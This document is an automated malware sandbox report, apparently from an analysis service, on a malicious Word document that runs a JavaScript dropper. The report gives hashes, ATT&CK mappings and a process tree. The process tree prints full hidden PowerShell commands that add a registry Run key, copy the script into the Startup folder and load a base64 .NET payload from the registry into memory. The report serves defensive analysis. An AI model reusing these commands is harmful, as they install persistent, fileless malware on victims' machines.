147f364a78efbe21c664cc3b57b52430a15a2d1856f10e0f4067942e39c9d6dc

General

Target

147f364a78efbe21c664cc3b57b52430a15a2d1856f10e0f4067942e39c9d6dc.doc
Size

54KB
MD5

c50aa75e55eacfd0a85643c81d6962c5
SHA1

3347d3c5b03afcd46ada31639c80174de5eac1df
SHA256

147f364a78efbe21c664cc3b57b52430a15a2d1856f10e0f4067942e39c9d6dc
SHA512

9e8bcac38eeab864ad914afa1ac81fcecc942dfc0bd90ab8bc3e9b720460792c8040133fc1118dc674263636f6ba28dbc69c4c7290bff13e0bf46394774d9694
SSDEEP

768:XRcXUzsZ/e5aO67lghmts3yeibSOFgOK:6X/eG7lghnyDb

Score

10^/10

discovery execution persistence

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	2092	1072	WScript.exe	29

Blocklisted process makes network request 1 IoCs

flow	pid	Process
10	2780	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
872	powershell.exe
644	powershell.exe
2780	powershell.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\avg.js	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\cocacola = "C:\\Users\\Admin\\AppData\\Roaming\\avg.js"	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Office loads VBA resources, possible macro or embedded object present

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	powershell.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1072	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2780	powershell.exe
644	powershell.exe
872	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeDebugPrivilege	644	powershell.exe
Token: SeDebugPrivilege	872	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1072	WINWORD.EXE
1072	WINWORD.EXE

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1072 wrote to memory of 2092	1072	WINWORD.EXE	30
PID 1072 wrote to memory of 2092	1072	WINWORD.EXE	30
PID 1072 wrote to memory of 2092	1072	WINWORD.EXE	30
PID 1072 wrote to memory of 2092	1072	WINWORD.EXE	30
PID 2092 wrote to memory of 644	2092	WScript.exe	32
PID 2092 wrote to memory of 644	2092	WScript.exe	32
PID 2092 wrote to memory of 644	2092	WScript.exe	32
PID 2092 wrote to memory of 644	2092	WScript.exe	32
PID 2092 wrote to memory of 872	2092	WScript.exe	34
PID 2092 wrote to memory of 872	2092	WScript.exe	34
PID 2092 wrote to memory of 872	2092	WScript.exe	34
PID 2092 wrote to memory of 872	2092	WScript.exe	34
PID 2092 wrote to memory of 2780	2092	WScript.exe	36
PID 2092 wrote to memory of 2780	2092	WScript.exe	36
PID 2092 wrote to memory of 2780	2092	WScript.exe	36
PID 2092 wrote to memory of 2780	2092	WScript.exe	36
PID 1072 wrote to memory of 2348	1072	WINWORD.EXE	40
PID 1072 wrote to memory of 2348	1072	WINWORD.EXE	40
PID 1072 wrote to memory of 2348	1072	WINWORD.EXE	40
PID 1072 wrote to memory of 2348	1072	WINWORD.EXE	40

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\147f364a78efbe21c664cc3b57b52430a15a2d1856f10e0f4067942e39c9d6dc.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1072
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\avg.js"
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2092
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'cocacola' -value 'C:\Users\Admin\AppData\Roaming\avg.js' -PropertyType String -Force;"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:644
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\avg.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\avg.js'))"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:872
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;$_b=$_b.replace('~','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2780
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2348

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cab319E.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar329B.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
7a979c60a10381e47a271a4db2d10aca

SHA1
ca200b91ab8aeef49001e475a5ce3ecc82f0008d

SHA256
dee9b53906959f983c7bee0a6cc79e7c230ac4ea18b296481de0c58643eeb572

SHA512
afa289c19bac06c26127d3b866b17e31ed5aaa847ea77d1da6e9cbb461df2e15ae49b0679b0256295f427f3daaea44923a5d5dab74ef80872625dd2386dfe570

Download Submit
C:\Users\Admin\AppData\Roaming\avg.js

Filesize
60KB

MD5
4d21175948ef7464aaac5cb6a191e2d9

SHA1
8ba376fa81916b44be0c02ce33813d9cd9c9bdaf

SHA256
b81e456cf92319440989cbde2b2484e6e11c6acb03ef493ca18e429294a3117f

SHA512
cf2b0162c5707c098254189d2db04dd38e0ab9bfdbbefe8b05843275cdcce5f5d19d4a4d24100c836bdc777d8f78ecd72cd7863adf31d0958a80150ae71ab983

Download Submit
memory/1072-5-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-61-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-8-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-7-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-6-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-0-0x000000002F4C1000-0x000000002F4C2000-memory.dmp

Filesize
4KB

Download
memory/1072-4-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-18-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-17-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-16-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-15-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-14-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-13-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-10-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-11-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-9-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-60-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-59-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-58-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-64-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-67-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-66-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-65-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-63-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-62-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-2-0x0000000070DED000-0x0000000070DF8000-memory.dmp

Filesize
44KB

Download
memory/1072-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1072-85-0x0000000070DED000-0x0000000070DF8000-memory.dmp

Filesize
44KB

Download
memory/1072-86-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-87-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-88-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download
memory/1072-89-0x0000000000750000-0x0000000000850000-memory.dmp

Filesize
1024KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads